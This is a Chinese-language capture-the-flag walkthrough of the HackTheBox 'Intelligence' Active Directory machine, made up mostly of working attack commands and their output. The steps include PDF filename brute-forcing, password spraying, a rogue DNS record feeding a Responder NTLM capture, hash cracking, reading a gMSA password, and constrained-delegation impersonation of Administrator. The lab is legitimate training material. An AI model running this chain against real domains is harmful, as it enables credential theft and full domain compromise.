Intelligence

1
2
3
4
ip a

10.129.95.154
TARGET="10.129.95.154"

01.信息搜集

靶机发现

目标靶机 ip 为 10.129.95.154

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
fscan -h $TARGET > fscan.log

# ===== 服务信息 =====
10.129.95.154:135 msrpc @
10.129.95.154:445 microsoft-ds SMB@ A 8 ( @ N .g x `v + l0j <0: + 7 * H * H * H + 7 *0( & $not_defined_in_RFC4178@please_ignore
10.129.95.154:53 domain version bind
http://10.129.95.154:139
http://10.129.95.154:80
10.129.95.154:3269 unknown
10.129.95.154:389 unknown
10.129.95.154:3268 unknown
10.129.95.154:636 unknown
10.129.95.154:88 unknown

# ===== Web服务 =====
http://10.129.95.154:139
http://10.129.95.154:80

grep -Eo '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+:[0-9]+' fscan.log | sed 's/^.*://' | sort -nu

02.渗透打点

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
sudo nmap -sT -sV -sC -O -p 53,80,88,135,139,389,445,636,3268,3269 $TARGET -oA nmapscan/detail

PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Intelligence
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-07-14 15:04:17Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped

OS CPE: cpe:/o:microsoft:windows_server_2019 cpe:/o:microsoft:windows_10
Aggressive OS guesses: Microsoft Windows Server 2019 (97%), Microsoft Windows 10 1903 - 22H2 (91%)

Host script results:
| smb2-time:
| date: 2026-07-14T15:04:56
|_ start_date: N/A
|_clock-skew: 6h59m55s
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required

sudo nmap -Pn -sV -A -p 445 -T4 $TARGET

web 80

展示页 mail 投递页面 看起来只是纯静态展示
域名 intelligence.htb

1
echo "10.129.95.154 intelligence.htb" | sudo tee -a /etc/hosts
1
2
3
4
5
6
7
8
9
10
11
12
13
子域名
ffuf -w /Users/choco/Project/HackTool/wordlists/SecLists/Discovery/DNS/namelist.txt \
-H "Host: FUZZ.intelligence.htb" -u http://intelligence.htb -fs 7432


子页面
gobuster dir -u http://intelligence.htb -w /Users/choco/Project/HackTool/wordlists/seclists/Discovery/Web-Content/common.txt -t 50
/documents

gobuster dir -u http://intelligence.htb/documents/ -w /Users/choco/Project/HackTool/wordlists/seclists/Discovery/Web-Content/common.txt -t 50
http://intelligence.htb/documents/2020-12-15-upload.pdf
http://intelligence.htb/documents/2020-01-01-upload.pdf
(爆破不出来 这是viewsource看到的)

SMB 45

1
2
3
4
5
6
7
8
9
10
11
smbclient -L //10.129.95.154 -N
Anonymous login successful

Sharename Type Comment
--------- ---- -------
SMB1 disabled -- no workgroup available

rpcclient -U "" -N 10.129.95.154

lookupsid guest@10.129.95.154 -no-pass
[-] SMB SessionError: code: 0xc0000072 - STATUS_ACCOUNT_DISABLED - The referenced account is currently disabled and may not be logged on to.

LDAP 389、636、3268、3269

1
2
3
4
ldapsearch -x -H ldap://10.129.95.154 -b "dc=example,dc=com" "(objectClass=*)"
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A5C, comment: In order to perform this ope
ration a successful bind must be completed on the connection., data 0, v4563

什么信息都没有?

看看 pdf
PDF 格式本质上是一个容器,它由四部分组成:

  • 文件头(Header)
  • 对象(Objects)—— 正文、图片、字体、元数据等
  • 交叉引用表(Cross-reference table)
  • 文件尾(Trailer)
    PDF 支持对象压缩、流对象(Stream)、增量更新等特性,数据可以嵌套多层,这给隐写提供了巨大的“藏匿空间”。

2. PDF 常见的隐写手法(对照你的文件可查)

隐写层级 具体手法 你的 1.pdf 可排查点
元数据层 XMP 元数据或 DocInfo 中插入 Base 64 编码的密文。 用文本编辑器打开开头部分,看 /Author/Subject 是否有异常长字符串。
流对象层(最常见) 修改图片流(如 JPEG/JPX)的最低有效位(LSB),或修改文本流的字间距、行距编码信息。 检查 PDF 内嵌图片的原始字节流,或使用 pdfid 查看是否存在非标准过滤器(如 /FlateDecode 嵌套 /Crypt)。
冗余对象层 插入一个未引用(Unreferenced) 的对象。PDF 阅读器会忽略它,但提取工具可以读取。 检查对象数量是否远大于页面实际所需(比如只有 1 页,却有上百个对象)。
增量更新层 利用 PDF 的增量保存特性,在文件末尾追加新的修订版本,旧数据被覆盖标记但并未擦除。 检查文件尾是否有多个 %%EOF 标记(正常只有 1 个,隐写可能有多个)。
文件名/附件层 将压缩包(ZIP/RAR)或 EXE 嵌入为 PDF 的附加文件(EmbeddedFile),并伪装成普通注释。 pdfdetach --list 查看是否有隐藏附件。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
# 1. 检查是否有多个 %%EOF(增量更新痕迹)
grep -c "%%EOF" 1.pdf
2
# 正常应为 1,若大于 1 则高度可疑

# 2. 检查对象数量是否异常 [kali]
pdfid 1.pdf
# 重点关注 /JS(JavaScript)、/EmbeddedFile、/OpenAction 是否为 0,非零则危险
PDFiD 0.2.10 1.pdf
PDF Header: %PDF-1.5
obj 9
endobj 9
stream 6
endstream 6
xref 0
trailer 0
startxref 2
/Page 0
/Encrypt 0
/ObjStm 1
/JS 0
/OpenAction 0

# 3. 提取所有可读字符串,看是否有 Base64 或乱码夹带
strings -n 8 1.pdf | tail -n 20
startxref
%BeginExifToolUpdate
14 0 obj
/Type /Catalog
/Pages 7 0 R
15 0 obj
/Creator (William.Lee)
17 0 obj
/Type /XRef
/Index [ 0 1 14 2 17 1 ]
/Size 18
/W [ 1 4 2 ]
/Root 14 0 R
/ID [ <4BFEAB960181CE5DF67F4BF230AD7C33> <4eFEAB960181CE5DF67F4BF230AD7C33> ]
/Length 28
/Prev 26107
/Info 15 0 R
endstream
%EndExifToolUpdate 26417
startxref

startxref
%BeginExifToolUpdate
14 0 obj
/Type /Catalog
/Pages 7 0 R
15 0 obj
/Creator (Jose.Williams)
17 0 obj
/Type /XRef
/Index [ 0 1 14 2 17 1 ]
/Size 18
/W [ 1 4 2 ]
/Root 14 0 R
/ID [ <A0581B7E7F013F27314AC751BB2FB42B> <a3581B7E7F013F27314AC751BB2FB42B> ]
/Length 28
/Prev 26513
/Info 15 0 R
endstream
%EndExifToolUpdate 26822
startxref
# 查看尾部是否有非PDF语法的长字符串

# 4. 查看隐藏的元数据
exiftool 1.pdf
ExifTool Version Number : 13.55
File Name : 1.pdf
Directory : .
File Size : 27 kB
File Modification Date/Time : 2026:07:14 16:24:36+08:00
File Access Date/Time : 2026:07:14 16:27:00+08:00
File Inode Change Date/Time : 2026:07:14 16:24:45+08:00
File Permissions : -rw-------
File Type : PDF
File Type Extension : pdf
MIME Type : application/pdf
PDF Version : 1.5
Linearized : No
Page Count : 1
Creator : William.Lee

确凿的增量更新痕迹
pdfid 显示只有 9 个对象,却有 6 个 stream —— 比例严重失调 ,正常 1 页 PDF:对象数通常在 1530 个,stream(流对象)约 35 个。
pdf 9 个对象中有 6 个是 stream,占比高达 67%。这意味着大量数据以二进制流形式存在,极不寻常,很可能藏匿了压缩/加密数据。
/ObjStm 为 1 —— 使用了对象流压缩
对象流(Object Stream)本身是合法特性,但常被用来混淆真实对象结构,增加分析难度。恶意 PDF 经常用 ObjStm 来隐藏/JS 或/EmbeddedFile,让 pdfid 扫不到(因为 pdfid 默认不深入解析 ObjStm 内部)。

1
2
3
4
5
6
7
/ID [ <4BFEAB960181CE5DF67F4BF230AD7C33> <4eFEAB960181CE5DF67F4BF230AD7C33> ]
/Length 28
/Prev 26107

/ID [ <A0581B7E7F013F27314AC751BB2FB42B> <a3581B7E7F013F27314AC751BB2FB42B> ]
/Length 28
/Prev 26513

找个正常 pdf

1
2
3
/ID [<f86162fc4935687ff544c5f4657dea41> <f86162fc4935687ff544c5f4657dea41>]
endstream
startxref

是只有一个 id 号的(重复两次 相同头尾) 这个 PDF 曾被 ExifTool 处理过(可能是用 exiftool -overwrite_original 修改过元数据)

但现在出现了两份独立的文件尾(Trailer),且/ID(文件唯一标识符)完全不同——这根本就不是同一个文件的增量更新,而是两个 PDF 文件被拼接/合并到了一个文件中!
特别是第二个 差异太大了

提取对象流中的隐藏数据

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
# 使用 pdf-parser 提取所有对象
pdf-parser -O 2.pdf > 2_objects.txt

# 查看对象流(ObjStm)里是否有非 PDF 内容
pdf-parser -s objstm 2.pdf
obj 6 0
Type: /ObjStm
Referencing:
Contains stream

<<
/Type /ObjStm
/N 10
/First 65
/Length 789
/Filter /FlateDecode
>>

结果是被追加了 creator

1
2
William.Lee 1.1
Jose.Williams 12.15

算是用户名 但是没密码 不然继续 smb 看看了

不对 怎么会只有 1.1 和 12.15 两天上传过呢 BP 爆破一下呗 (01-12)

1
http://intelligence.htb/documents/2020-{}-{}-upload.pdf

找到了 /documents/2020-04-04-upload.pdf

1
http://intelligence.htb/documents/2020-04-04-upload.pdf
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
startxref
%BeginExifToolUpdate
14 0 obj
/Type /Catalog
/Pages 7 0 R
15 0 obj
/Creator (Jose.Williams)
17 0 obj
/Type /XRef
/Index [ 0 1 14 2 17 1 ]
/Size 18
/W [ 1 4 2 ]
/Root 14 0 R
/ID [ <2AE77D410446574C1583D54C51529D14> <2dE77D410446574C1583D54C51529D14> ]
/Length 28
/Prev 27219
/Info 15 0 R
endstream
%EndExifToolUpdate 27529
startxref


obj 15 0
Type:
Referencing:

<<
/Creator (Jose.Williams)
>>


obj 17 0
Type: /XRef
Referencing: 14 0 R, 15 0 R
Contains stream

<<
/Type /XRef
/Index [ 0 1 14 2 17 1 ]
/Size 18
/W [ 1 4 2 ]
/Root 14 0 R
/ID [ <2AE77D410446574C1583D54C51529D14> <2dE77D410446574C1583D54C51529D14> ]
/Length 28
/Prev 27219
/Info 15 0 R
>>


PDF Comment '%EndExifToolUpdate 27529\n'

startxref 27647

PDF Comment '%%EOF\n'

还是没有隐藏的 那难道是明文?

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
Consectetur non est voluptatem etincidunt ut neque
velit.
Velit tempora etincidunt sit eius dolor. Consectetur porro etincidunt voluptatem
dolor modi aliquam. Velit etincidunt velit etincidunt neque modi. Numquam
magnam adipisci consectetur adipisci etincidunt neque neque. Modi dolorem
magnam dolore.
Est consectetur tempora etincidunt quisquam. Labore numquam quisquam non
modi est labore quaerat. Amet neque voluptatem voluptatem labore aliquam
tempora. Magnam amet aliquam ipsum quisquam ut velit porro. Aliquam neque
consectetur quiquia dolor ut amet dolor. Numquam velit neque sed quisquam
velit dolore labore. Amet labore quisquam tempora est. Ut ipsum modi non
voluptatem sit. Modi aliquam dolor sit. Modi tempora numquam dolorem sit
ut quiquia.
Adipisci velit numquam porro dolor eius quaerat quaerat. Velit dolore modi
quisquam. Quiquia ipsum etincidunt est tempora. Neque non neque sit dolorem consectetur voluptatem eius. Eius quisquam eius etincidunt. Est amet
labore quiquia numquam. Ipsum numquam non voluptatem dolorem quaerat
quisquam non.
Magnam quaerat velit etincidunt dolore dolor. Amet dolor dolor non tempora.
Aliquam adipisci tempora consectetur modi quiquia tempora porro. Amet adipisci voluptatem labore. Sit quisquam quaerat ipsum consectetur dolor labore
quaerat. Est amet amet dolorem ipsum eius voluptatem. Sit ut voluptatem sed
numquam amet. Etincidunt eius est modi. Modi sed etincidunt amet.

一般来说这种都是占位语言 Lorem Ipsum 文本不会有意义 但是可能这个是那种字典 密码就在里面

有一个: Modi 反复出现

试了也不对 这里是因为 bp 模式用错了 这里得用 bumb (看爆破了多少天 理论上得爆破 370+因为每个月爆 31 天)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
#!/bin/bash
TARGET="10.129.95.154"
BASE="http://intelligence.htb/documents"
OUTDIR="/Users/choco/Project/HackTheBox/Intelligence/pdfs"

mkdir -p "$OUTDIR"

for month in $(seq -w 1 12); do
for day in $(seq -w 1 31); do
filename="2020-${month}-${day}-upload.pdf"
url="${BASE}/${filename}"
outname="${month}${day}.pdf"

code=$(curl -s -o /dev/null -w "%{http_code}" "$url")
if [ "$code" = "200" ]; then
curl -s -o "${OUTDIR}/${outname}" "$url"
echo "[OK] ${outname} <- ${filename}"
fi
done
done

echo "Done. Files in: $OUTDIR"

80 个 pdf..

批量 grep creator:

1
2
3
4
5
6
7
8
9
10
11
12
for f in *.pdf; do creator=$(strings "$f" | grep '/Creator' | grep -v 'TeX' | head -1 | sed 's/.*(\(.*\)).*/\1/'); if [ -n "$creator" ]; then echo "$f $creator"; fi; done | sort -k2

Anita.Roberts Brian.Baker Brian.Morris
Daniel.Shelton Danny.Matthews Darryl.Harris
David.Mcbride David.Reed David.Wilson
Ian.Duncan Jason.Patterson Jason.Wright
Jennifer.Thomas Jessica.Moody John.Coleman
Jose.Williams Kaitlyn.Zimmerman Kelly.Long
Nicole.Brock Richard.Williams Samuel.Richardson
Scott.Scott Stephanie.Young Teresa.Williamson
Thomas.Hall Thomas.Valenzuela Tiffany.Molina
Travis.Evans Veronica.Patel William.Lee

而且最后一篇:

1
2
3
4
5
6
7
8
9
10
11
12
New Account Guide
Welcome to Intelligence Corp!
Please login using your username and the default password of:
NewIntelligenceCorpUser9876
After logging in please change your password as soon as possible.

Internal IT Update
There has recently been some outages on our web servers. Ted has gotten a script in place to help notify us if this happens again.
Also, after discussion following our recent security audit we are in the process of locking down our service accounts.
内部 IT 更新
我们最近的一些网络服务器出现了停机。泰德已经设置了一个脚本,以帮助我们再次发生这种情况时得到通知。
此外,在我们最近的安全生产审核后,我们正在锁定我们的服务账户。

H4cker/AredTeam/笔记整理/06-AD域渗透/Kerberoasting与AS-REP 方法论中

AS-REP Roasting 针对设置了”不要求 Kerberos 预认证”(UF_DONT_REQUIRE_PREAUTH)的用户。无需凭据即可向 KDC 请求其 AS-REP 响应(使用用户密码哈希加密的部分),离线破解。

先遍历看看哪些用户不需要预认证

1
2
# 枚举不需要预认证的用户(无凭据)
GetNPUsers.py intelligence.htb/ -usersfile users.txt -dc-ip 10.129.95.154

没有

现在还有一个默认密码 看看谁没改密码

密码喷洒(Password Spraying)

1
2
3
4
5
6
kerbrute passwordspray -d intelligence.htb --dc 10.129.95.154 users.txt 'NewIntelligenceCorpUser9876'
[+] VALID LOGIN WITH ERROR: Tiffany.Molina@intelligence.htb:NewIntelligenceCorpUser9876 (Clock skew is too great)
2026/07/14 17:34:50 > Done! Tested 30 logins (1 successes) in 3.687 seconds


Tiffany.Molina@intelligence.htb:NewIntelligenceCorpUser9876

获得了凭据

现在请求所有 TGS 票据(而不是他自己的)
Tiffany 先向 KDC 证明自己身份 → 拿到 TGT
Tiffany 对 KDC 说:”我想访问 MSSQLSvc/server.htb 这个服务”
KDC 不会检查 “Tiffany 有没有权限访问 MSSQL”——它只看 “Tiffany 的 TGT 是否有效”
KDC 用 MSSQL 服务账户的密码哈希 加密一张服务票证,发给 Tiffany

关键在于第 4 步:票证用的是服务账户的密钥加密的,不是 Tiffany 的。所以任何人都能请求,拿到手后离线爆破密钥,这就是 Kerberoasting。

1
2
3
sudo ntpdate 10.129.95.154

GetUserSPNs.py -dc-ip 10.129.95.154 intelligence.htb/Tiffany.Molina:'NewIntelligenceCorpUser9876'

域内没有注册任何 SPN。有点反常,但说明这个 DC 确实在”锁定”中
Kerberos 无效

那就 smb 登录看看

smb

smbclient.py — SMB 客户端

1
smbclient.py <DOMAIN>/<user>:'<password>'@<IP>

提供交互式 SMB Shell,支持 ls/cd/get/put 等操作。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
smbclient.py "intelligence.htb/Tiffany.Molina:NewIntelligenceCorpUser9876"@10.129.95.154

# shares
ADMIN$
C$
IPC$
IT
NETLOGON
SYSVOL
Users

# IT

# Users/Tiffany.Molina/Desktop/user.txt

download.ps1 应该是 ted 那个

1
2
3
4
5
6
7
8
9
10
11
# Check web server status. Scheduled to run every 5min
Import-Module ActiveDirectory
foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*") {
try {
$request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials
if(.StatusCode -ne 200) {
Send-MailMessage -From 'Ted Graves <Ted.Graves@intelligence.htb>' -To 'Ted Graves <Ted.Graves@intelligence.htb>' -Subject "Host: $($record.Name) is down"
}
} catch {}
}

Ted.Graves@intelligence.htb
每 5 分钟,这个计划任务就会拿它自己的凭据去 HTTP 请求 DNS 中所有 web* 记录指向的主机

那如果请求到了我们的服务器 那就监听到凭据了?
往 DNS 里加一条 webevil.intelligence.htb → 指向你的 IP
起一个 HTTP 监听(Responder / impacket-smbserver)
等脚本触发 → NTLM 哈希到手

看看有没有 DNS 修改权限

1
2
bloodyAD -H 10.129.95.154 -d intelligence.htb -u Tiffany.Molina -p 'NewIntelligenceCorpUser9876' add dnsRecord webchoco 10.10.17.30
[+] webchoco has been successfully added

1
2
bloodyAD -H 10.129.95.154 -d intelligence.htb -u Tiffany.Molina -p 'NewIntelligenceCorpUser9876' get dnsDump | grep web
recordName: webchoco.intelligence.htb

ok 可以写

1
2
/Users/choco/Project/HackTool/windows/smb/Responder
sudo python Responder.py -I utun5 -i 10.10.17.30 -v
1
2
3
4
5
6
7
8
9
10
[HTTP] Sending NTLM authentication request to 10.129.95.154
[HTTP] GET request from: ::ffff:10.129.95.154 URL: /
[HTTP] NTLMv2 Client : 10.129.95.154
[HTTP] NTLMv2 Username : intelligence\Ted.Graves
[HTTP] NTLMv2 Hash : Ted.Graves::intelligence:73a0bf07bccf1436:39449E0BD149C23F4392A3E7B3B0528B:0101000000000000A811E12CB713DD01EEBBCC67535EA7D0000000000200080050004B004200470001001E00570049004E002D0031004C00510034003900390043005000300034004F000400140050004B00420047002E004C004F00430041004C0003003400570049004E002D0031004C00510034003900390043005000300034004F002E0050004B00420047002E004C004F00430041004C000500140050004B00420047002E004C004F00430041004C00080030003000000000000000000000000020000061E9012B610728780694F51BD78809783729F5476E3BC0BE44B495812AEDB3A50A0010000000000000000000000000000000000009003A0048005400540050002F007700650062006500760069006C002E0069006E00740065006C006C006900670065006E00630065002E006800740062000000000000000000


hashcat -m 5600 hash.txt ~/Project/HackTool/wordlists/rockyou.txt

Mr.Teddy

有效的域凭据 权限类似管理员了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
smbclient.py "intelligence.htb/Ted.Graves:Mr.Teddy"@10.129.95.154

# pwd
/Ted.Graves
# ls
drw-rw-rw- 0 Mon Apr 19 09:20:26 2021 .
drw-rw-rw- 0 Mon Apr 19 09:20:26 2021 ..
drw-rw-rw- 0 Mon Apr 19 09:20:26 2021 AppData
drw-rw-rw- 0 Mon Apr 19 09:20:26 2021 Application Data
drw-rw-rw- 0 Mon Apr 19 09:20:26 2021 Cookies
drw-rw-rw- 0 Mon Apr 19 09:20:26 2021 Desktop
drw-rw-rw- 0 Mon Apr 19 09:20:26 2021 Documents
drw-rw-rw- 0 Mon Apr 19 09:20:26 2021 Downloads
drw-rw-rw- 0 Mon Apr 19 09:20:26 2021 Favorites
drw-rw-rw- 0 Mon Apr 19 09:20:26 2021 Links
drw-rw-rw- 0 Mon Apr 19 09:20:26 2021 Local Settings
drw-rw-rw- 0 Mon Apr 19 09:20:26 2021 Music
drw-rw-rw- 0 Mon Apr 19 09:20:26 2021 My Documents

没什么信息 看看权限

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
# 以TED凭据执行 DCSync
secretsdump.py intelligence.htb/Ted.Graves:'Mr.Teddy'@10.129.95.154
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[-] DRSR SessionError: code: 0x20f7 - ERROR_DS_DRA_BAD_DN - The distinguished name specified for this replication operation is invalid.
[*] Something went wrong with the DRSUAPI approach. Try again with -use-vss parameter
[*] Cleaning up...

secretsdump.py intelligence.htb/Ted.Graves:'Mr.Teddy'@10.129.95.154 -just-dc-user Administrator

secretsdump.py intelligence.htb/Ted.Graves:'Mr.Teddy'@10.129.95.154 -just-dc-user krbtgt

# 权限(member)查询
bloodyAD -H 10.129.95.154 -d intelligence.htb -u Ted.Graves -p 'Mr.Teddy' get object Ted.Graves --attr memberOf
distinguishedName: CN=Ted Graves,CN=Users,DC=intelligence,DC=htb
memberOf: CN=IT Support,CN=Users,DC=intelligence,DC=htb

没找到什么 bloodBound !

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
bloodhound-python -d intelligence.htb -u Ted.Graves -p 'Mr.Teddy' -c All -ns 10.129.95.154 --zip

TED.GRAVES@INTELLIGENCE.HTB

memberof

ITSUPPORT@INTELLIGENCE.HTB

read gmsa password

retrieve the password for the GMSA
SVC_INT$@INTELLIGENCE.HTB



任何有权访问 GMSA 密码的计算机/用户,都可以提取该密码并用来冒充该账户
1
2
3
4
5
6
7
8
bloodyAD -H 10.129.95.154 -d intelligence.htb -u Ted.Graves -p 'Mr.Teddy' get object 'SVC_INT$' --attr msDS-ManagedPassword

distinguishedName: CN=svc_int,CN=Managed Service Accounts,DC=intelligence,DC=htb
msDS-ManagedPassword.NT: 51854c912c4caa549034deb480ca8e75
msDS-ManagedPassword.B64ENCODED: ZEq3dhaVtxOkg1Edj4OZjFUudFaNpGNghk9axsp9ufERQg8a3SJRufioVkoYY4h/cxG+yHGYI1BxbsnSF3benfR6Y1LFiDtwLQ6QTQdGHJzRcJbTSjD731Jz9M1k2XFy0f14t0iXpmN/q5aVRbn9XWlvuyDAlhxv8AjJspJHUnEzXd0/l5fpZOqGk8VvpK06cUArNMrYKzoEyKkxaulWw64m1UZPS+491e5QnBn3WxJVHbXJz+hBulWTItwfxC7v5rtmD53bAlAM8lqGoEMGcOdZ7WkRPVHJBZxaDup6DV3AmmM5RgnQwrM2XhdpxhrZUMvxRC9TK8liFIt9WzkyvQ==


msDS-ManagedPassword.NT: 51854c912c4caa549034deb480ca8e75

ok 可以用 svc 账号了

继续往后看权限

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
bloodyAD -H 10.129.95.154 -d intelligence.htb -u Ted.Graves -p 'Mr.Teddy' get object 'SVC_INT$' --attr memberOf
distinguishedName: CN=svc_int,CN=Managed Service Accounts,DC=intelligence,DC=htb

bloodyAD -H 10.129.95.154 -d intelligence.htb -u Ted.Graves -p 'Mr.Teddy' get object 'SVC_INT$' --attr msDS-AllowedToDelegateTo
distinguishedName: CN=svc_int,CN=Managed Service Accounts,DC=intelligence,DC=htb
msDS-AllowedToDelegateTo: WWW/dc.intelligence.htb (看bloodBound也有)

# 继续采集(多余了)
bloodhound-python -d intelligence.htb -u 'SVC_INT$' --hashes :51854c912c4caa549034deb480ca8e75 -c All -ns 10.129.95.154 --zip

Node Type:
User
Object ID:
S-1-5-21-4210132550-3389855604-3437519686-1144
Admin Count:
FALSE
Allowedtodelegate:
WWW/dc.intelligence.htb

对 WWW/dc.intelligence.htb 有约束委派
意味着它可以冒充任意用户(包括 Administrator)访问 DC 上的 IIS。
对 KDC 说:”我是 Administrator,我要访问 WWW/dc”,KDC 信了——因为 SVC_INT$ 被授权可以替别人说话。拿到票后直接 evil-winrm 登 DC

1
2
3
4
5
6
7
getTGT.py -hashes :51854c912c4caa549034deb480ca8e75 'intelligence.htb/SVC_INT$' -dc-ip 10.129.95.154

export KRB5CCNAME=SVC_INT\$.ccache

getST.py -spn WWW/dc.intelligence.htb -impersonate Administrator -hashes :51854c912c4caa549034deb480ca8e75 'intelligence.htb/SVC_INT$' -dc-ip 10.129.95.154

[*] Saving ticket in Administrator@WWW_dc.intelligence.htb@INTELLIGENCE.HTB.ccache
1
2
3
4
5
6
7
8
9
export KRB5CCNAME=Administrator@WWW_dc.intelligence.htb@INTELLIGENCE.HTB.ccache

evil-winrm -i <DC_HOSTNAME> -r <DOMAIN_UPPER> -u <USERNAME> -K <CCACHE_FILE>

evil-winrm -i dc.intelligence.htb -r intelligence.htb -u Administrator -K Administrator@WWW_dc.intelligence.htb@INTELLIGENCE.HTB.ccache (不行)

--------

wmiexec.py -k -no-pass dc.intelligence.htb